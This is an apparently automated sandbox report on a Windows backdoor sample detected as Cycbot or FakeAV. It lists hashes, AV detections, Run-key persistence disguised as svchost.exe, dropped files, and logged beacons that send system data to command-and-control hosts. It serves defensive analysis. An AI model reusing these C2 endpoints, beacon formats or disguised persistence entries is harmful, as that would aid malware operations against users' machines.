Analysis Date: 2014-12-03 01:53:42
MD5: 13a6612993eaf50ccdfb7b91ff94dca5
SHA1: 2def034baf6e8890f3d6a8f4aa384706a9bc3cd5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 0630e9bfd501a822f5af451dfe182bef sha1: 2cd1e4c14dff59bd4acf1586398e8c00388f1698 size: 75776
Section: .rdata md5: f70ce95bdf27c4827ea0fb973aa8c018 sha1: c040030d987e9eeb64650d6a2556b3abf523ec8a size: 3072
Section: .data md5: 4b50006876c14389cb1889f966e81738 sha1: 5331983cd4270e3b2444040d16136e9096a8b3c3 size: 23040
Section: .rsrc md5: 7ec53830eae4252fb8f11e96bbe32aaa sha1: 361e1f688f126b310d3e8d69271ca293fe9ecc20 size: 1024
Timestamp: 2005-09-05 15:31:45
Version: PrivateBuild: 1147
FileDescription: Windows Host Process
PEhash: 6ac6b5190dea60dce00d1df6214dbe16b5181a1a
IMPhash: 8abc07be48f6a4adc99cacc7419273cf
AV 360 Safe: Gen:Variant.Kazy.2921
AV Ad-Aware: Gen:Variant.Kazy.2921
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Packed.Krap.hy
AV Authentium: W32/Goolbot.B.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Variant.Kazy.2921
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Agent-215589
AV Dr. Web: Trojan.DownLoader1.35728
AV Emsisoft: Gen:Variant.Kazy.2921
AV Eset (nod32): Win32/Kryptik.JAD
AV Fortinet: W32/FakeAV.BZD!tr
AV Frisk (f-prot): W32/Goolbot.B.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.2921
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Trojan.Win32.FakeAV
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Packed.Win32.Krap.hy
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.d
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.2921
AV Norman: Gen:Variant.Kazy.2921
AV Rising: 0x55af3b03
AV Sophos: Troj/FakeDpr-A
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.google.com
Winsock DNS: www.pcdocpro.com
Winsock DNS: 127.0.0.1
Winsock DNS: blogsmonitoringservice.com
Winsock DNS: findeffectivecasino.com
Winsock DNS: bigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNS: pcdocpro.com
Type: A
209.59.161.20
DNS: www.google.com
Type: A
74.125.227.179
DNS: www.google.com
Type: A
74.125.227.180
DNS: www.google.com
Type: A
74.125.227.176
DNS: www.google.com
Type: A
74.125.227.177
DNS: www.google.com
Type: A
74.125.227.178
DNS: protectyourpc-11.com
Type: A
74.200.250.181
DNS: www.pcdocpro.com
Type: A
DNS: bigtelevideochanel.com
Type: A
DNS: blogsmonitoringservice.com
Type: A
DNS: findeffectivecasino.com
Type: A
HTTP GET: http://www.pcdocpro.com/images/logo-1.jpg?tq=gP4aKyd71obJgsE4W8%2BGzRzK80Yz6R4xoNzyPZGQwHNJidGv8pXg1TT5K55Hg29%2BrELuOFKyEcdr%2BBwtOVx3DycpWH8xEjvH9Ppa9h7K5OVX8AKZSoUylWYCmHrZu%2BUylWUekWj%2BWG91kBddRMJ5imOrDgNomv2otAUiKLK3lrcu9twgTnW0ELHO17qEzfdSb2xO4p2esm6oRrMKfhGLRsKSDALWf2PW4f0K2YxZ0efMmk4D%2FjenSyff3W3HwbWeMkk%2BM%2FDSF8UDFA8z5VouOEOdXm29v36QfsKTCGyvmogz2mgCWerJPLg0sXRikxBW4gsvfXIahJLGB%2BtYenvhbucN%2BSPdWy1XhnU7sXN68HejtxqeZX9c7WLOV%2B4VOhd6gqKgxxH2AMgxDng6PXck3rzg4EV0VnCp%2BRUE2LA419ZaLHVVHOUfXUeswMthxsrLDD8RDN%2FnjFRFN6TYKlu3j6UYG9IEqXgI2pKufgNrRKRaRoipgExTiEbO%2FAuFKRqIhqECUsxsJ0gBe3IyRSladb90m8oMXBPzKv03oYzSRsHi%2BSPZl3S2cmC0Ca9BbQZx6gh0kMbGyaNl3f%2FIjdBOnOw1aB2MclQr5kUhQyyu0l6ySHemUp6KG7Re3aZVjp7HOjUmzv%2Fze1WyXx2bAGDSAUsZhMxF
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err094_43_11001_0_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_5&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP: 192.168.1.1:1032 ➝ 74.125.227.179:80
Flows TCP: 192.168.1.1:1033 ➝ 74.125.227.179:80
Flows TCP: 192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1038 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1039 ➝ 74.200.250.181:80

Raw Pcap

Strings
